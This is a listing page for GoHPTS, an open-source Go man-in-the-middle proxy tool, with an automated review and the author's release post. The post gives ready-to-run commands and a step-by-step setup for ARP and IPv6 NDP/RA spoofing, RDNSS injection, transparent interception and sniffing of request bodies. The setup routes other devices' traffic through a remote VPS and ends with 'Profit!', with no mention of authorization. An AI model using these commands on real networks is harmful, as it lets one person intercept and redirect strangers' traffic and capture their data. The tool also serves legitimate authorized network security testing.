GitHub Repository

Simple CLI MITM tool that transforms SOCKS4/SOCKS5 proxy into HTTP/HTTPS/HTTP2/HTTP3 proxy with IPv4/IPv6 support for TCP/UDP Transparent Proxy (Redirect and TProxy), Proxychains, ARP/NDP/RA/RDNSS spoofing, RA Guard evasion, DNS spoofing, DNS filtering and Traffic Capture/Sniffing. No CGO, no libpcap, pure Go with minimum third-party dependencies.

65 starsGo

Gohpts-IPv4/IPv6/TCP/UDP Transparent Proxy with ARP/NDP/Rdnss Spoofing

Name: Gohpts-IPv4/IPv6/TCP/UDP Transparent Proxy with ARP/NDP/Rdnss Spoofing
Availability: InStock
Author: shadowy-pycoder

by shadowy-pycoder·Mar 13, 2026·1 point·0 comments

Visit Project View on HN

AI Analysis

●●SolidWizardryShip It

Built-in IPv6 NDP spoofing turns SOCKS chains into transparent proxies.

Strengths

•Native IPv6 NDP spoofing handles RA/NA packets without external tools.
•Supports complex SOCKS5 chains with random, round-robin, and dynamic modes.
•Transparent proxy mode requires zero client configuration via iptables TProxy.

Weaknesses

•Requires root access for spoofing, limiting deployment in restricted environments.
•Documentation focuses on flags rather than real-world attack or testing scenarios.

Post Description

GoHPTS got updated to v1.12.1 with support for IPv6 protocol and NDP spoffing support (RA/NA spoofing, RDNSS injections)

GoHPTS has in-built functionality to perform NDP spoofing in IPv6 networks with Router Advertisement (RA) and Neighbor Advertisement (NA) packets. It also includes RDNSS option in RA packets to put host as a IPv6 nameserver for affected clients. When combined with transparent proxy mode (TCP/UDP), NDP spoofing allows `gohpts` to proxy traffic for clients in the local networks. As is the case with [ARP spoofing](#arp-spoofing), you can set ndp spoof options with single `-ndpspoof` flag:

Example:

sudo env PATH=$PATH gohpts -d -T 8888 -M tproxy -sniff -body -auto -mark 100 -ndpspoof "ra true;na true;targets fe80::3a1c:7bff:fe22:91a4;fullduplex false;debug true"

For more information about ndpspoof options see `gohpts -h` and https://github.com/shadowy-pycoder/ndpspoof

Plese note that some options like `rdnss`, `gateway`, `interface` are set automatically by `gohpts` itself to properly function as a proxy.

Since `gohpts` proxies all connections via upstream SOCKS5 server, you need to have a working server with IPv4/IPv6 and TCP/UDP support. Obviously, a remote machine (e.g. VPS) should also have IPv6 connectivity working. Needless to say, the machine on which `gohpts` is installed should be part of network with IPv6 support.

Example setup for NDP spoofing to work correctly:

1. Connect to VPS

ssh [email protected]

2. Install dependencies

GO_VERSION=$(curl 'https://go.dev/VERSION?m=text' | head -n1) cd ~/Downloads/ && wget https://go.dev/dl/$GO_VERSION.linux-amd64.tar.gz sudo rm -rf /usr/local/go && sudo tar -C /usr/local -xzf $GO_VERSION.linux-amd64.tar.gz

3. Setup SOCKS5 server (make sure firewall rules do not block used ports)

git clone https://github.com/wzshiming/socks5.git && cd socks5 go build -o ./bin/socks5_server ./cmd/socks5/*.go ./bin/socks5_server -a :3000

4. Go back to your host machine and install `gohpts` installation

5. Run `gohtps`:

sudo env PATH=$PATH gohpts -s 203.0.113.10:3000 -T 8888 -Tu 8889 -M tproxy -sniff -body -auto -mark 100 -arpspoof "fullduplex true;debug true" -ndpspoof "ra true;debug true " -6 -d

6. Get another device (phone, tablet, etc) and connect it to the same network. Try to access Internet and check if some traffic appears on your host machine. Check public IP address with some online tools (it should match your VPS address `203.0.113.10` in this case or global IPv6 address)

7. Stop proxy by hitting Ctrl+C

8. Profit!

Links: https://github.com/shadowy-pycoder/go-http-proxy-to-socks) https://codeberg.org/shadowy-pycoder/go-http-proxy-to-socks)

https://github.com/shadowy-pycoder/ndpspoof https://codeberg.org/shadowy-pycoder/ndpspoof

https://github.com/shadowy-pycoder/arpspoof https://codeberg.org/shadowy-pycoder/arpspoof